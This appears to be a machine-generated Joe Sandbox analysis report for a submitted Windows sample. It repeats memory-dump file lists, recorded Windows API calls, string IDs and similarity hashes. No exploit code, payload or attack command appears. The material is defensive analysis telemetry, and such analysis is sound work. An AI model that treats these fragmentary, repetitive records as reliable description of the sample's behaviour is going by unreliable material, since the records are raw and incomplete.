                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$HandleModuleNameWrite
                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                        • API String ID: 3784150691-4022980321
                                                                                                                        • Opcode ID: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                        • Instruction ID: c978e48409516c837b9f7d6b109fcdf73a8d35c650ed7adbf1cf9c7f4bbfdedb
                                                                                                                        • Opcode Fuzzy Hash: 0650768163dc9c4f50a05eeedea7922e1b2777f21abb24aa52f7481acea4e2f8
                                                                                                                        • Instruction Fuzzy Hash: 84311532700224ABDB20AB75BCC2EAF3769EB45314FA1082FF515E3193DE3C9955866C
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                        • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                        • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                                                                        • String ID: .CHM$.HLP$.INI
                                                                                                                        • API String ID: 2140653559-4017452060
                                                                                                                        • Opcode ID: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                        • Instruction ID: 3da9f7d339a1fb26a9a14cda2295bd93ec93db32f178aaf1e18dcb2e1e69cc93
                                                                                                                        • Opcode Fuzzy Hash: ced7ff398e87d1135350ecddd8461c4ca43fbd78145f9f545ec3a784a9eb423a
                                                                                                                        • Instruction Fuzzy Hash: 6E415D719407089FEB70EFA9D884A9A77E8BF08705F10482FF585D7241EB789640CB29
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0044D0A0,00000118,004247AD,00000001,00000000,0044C958,00000008,0042CEFA,00000000,00000000,00000000), ref: 0042B393
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                        • API String ID: 514040917-1673886896
                                                                                                                        • Opcode ID: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                        • Instruction ID: b314efe4c5fffc74cec8ecc2e7cadf2550e4b4112e7a556f74e2c9ec29160370
                                                                                                                        • Opcode Fuzzy Hash: 7b7436470715e0ab242502db6aa4f86c5c1c566535bae1bf5ed96faf37d5266a
                                                                                                                        • Instruction Fuzzy Hash: 2A312331B012246BE701AB61AC82F9F37699F04718FA4406FF510A7293CB3C9A254B9D
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,0044CC10,00000128,0040A5D1), ref: 00426CC2
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00426CD8
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000001), ref: 00426D49
                                                                                                                        • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 00426D90
                                                                                                                        • GetLastError.KERNEL32 ref: 00426DA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$EnvironmentErrorLastVariable
                                                                                                                        • String ID: :$=
                                                                                                                        • API String ID: 373561786-2134709475
                                                                                                                        • Opcode ID: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                        • Instruction ID: 7366dd2e4e53350f74b67eef3e98498b2befc9c9fea16cefb053c97ee1566376
                                                                                                                        • Opcode Fuzzy Hash: d246460a0d1c12df66941f8161f6431982f52375665ff665cc06cfe1cca94e64
                                                                                                                        • Instruction Fuzzy Hash: C031DB71A042784BCB219F64AC456DEBBB4AF4A314F85019FE49492251CB385E91CF59
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32(774D0A60,00000000,?,?,?,?,00425792), ref: 0042D3F0
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00425792), ref: 0042D404
                                                                                                                        • GetEnvironmentStringsW.KERNEL32(774D0A60,00000000,?,?,?,?,00425792), ref: 0042D426
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,774D0A60,00000000,?,?,?,?,00425792), ref: 0042D45A
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00425792), ref: 0042D47C
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00425792), ref: 0042D495
                                                                                                                        • GetEnvironmentStrings.KERNEL32(774D0A60,00000000,?,?,?,?,00425792), ref: 0042D4AB
                                                                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042D4E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 883850110-0
                                                                                                                        • Opcode ID: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                        • Instruction ID: 472f25f2f3a0fa31c34653a7449e3421f98c337e42acfa1e6a6286993b93246e
                                                                                                                        • Opcode Fuzzy Hash: 7c0e9ceb1b89135fe4a9d1fa8d699901a3612c02d2d8f3092bb4031cb0782976
                                                                                                                        • Instruction Fuzzy Hash: 7731F2B2F042746FD7207F75BC8493BB6ACEA463587A60A3FF545C3201D639AC41866E
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0042AF1E: GetLastError.KERNEL32(?,00000000,00427906,004297FA,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD), ref: 0042AF20
                                                                                                                          • Part of subcall function 0042AF1E: GetCurrentThreadId.KERNEL32 ref: 0042AF6D
                                                                                                                          • Part of subcall function 0042AF1E: SetLastError.KERNEL32(00000000,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8,0000000C), ref: 0042AF84
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A45
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431A9E
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ABB
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431ADE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLast$CurrentThread
                                                                                                                        • String ID: mE
                                                                                                                        • API String ID: 1370660682-852767849
                                                                                                                        • Opcode ID: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                        • Instruction ID: c8d6d545ca8254b81aa9c793cbca4ed0fd90ebe6b659f5e3f0dc62acac4ae604
                                                                                                                        • Opcode Fuzzy Hash: 81a580f5548f44e620a14ececa36babffeaa0d36948ae564853dc6f46e4ae9dd
                                                                                                                        • Instruction Fuzzy Hash: 0B61C4B6B00315AFDB14AF99CC41BAEB2B6EF88314F64452FF50097291D7B99D008B58
                                                                                                                        APIs
                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00411E74
                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00411EA7
                                                                                                                        • MessageBoxA.USER32(00000000,?,00446A11,00000001), ref: 00411F83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveDrivesLogicalMessageType
                                                                                                                        • String ID: %c:\$\Disk Images\$\Disk Images\Disk%d
                                                                                                                        • API String ID: 1359937597-868800301
                                                                                                                        • Opcode ID: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                        • Instruction ID: 8afbe327e4d74a6595be96fadd5310b57a40e0fcd72e5554749058cd2a1246b8
                                                                                                                        • Opcode Fuzzy Hash: 42e1eaf1bff76668b61a5634081314ccc6a254b27d15284cf4f303d86f70a8b2
                                                                                                                        • Instruction Fuzzy Hash: 7061D2712043409BD330DB94DC81FEBB7E9EBC9310F44091FFA8987241EA79A945CB6A
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(?,?,0044EB50,00000038,0042C533,?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?), ref: 004325D2
                                                                                                                        • GetCPInfo.KERNEL32(?,00000001,?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 004325E5
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,0042C39D,?,?,00000008,?,?,00424C62,?), ref: 0043262A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info$ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1166650589-0
                                                                                                                        • Opcode ID: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                        • Instruction ID: ea13df6ffc39fcabe32b01fc689c9ae28562827eed5415b20872082be15f5b55
                                                                                                                        • Opcode Fuzzy Hash: be422299c7746ac2b38f3bb3e6242e5a1681e52eba28ec17eee5157774e3f445
                                                                                                                        • Instruction Fuzzy Hash: E6519C70901218FBCF218F65ED858AFBBB8FF89750F20512AF814A2250D7755D41CB68
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00438800
                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00438827
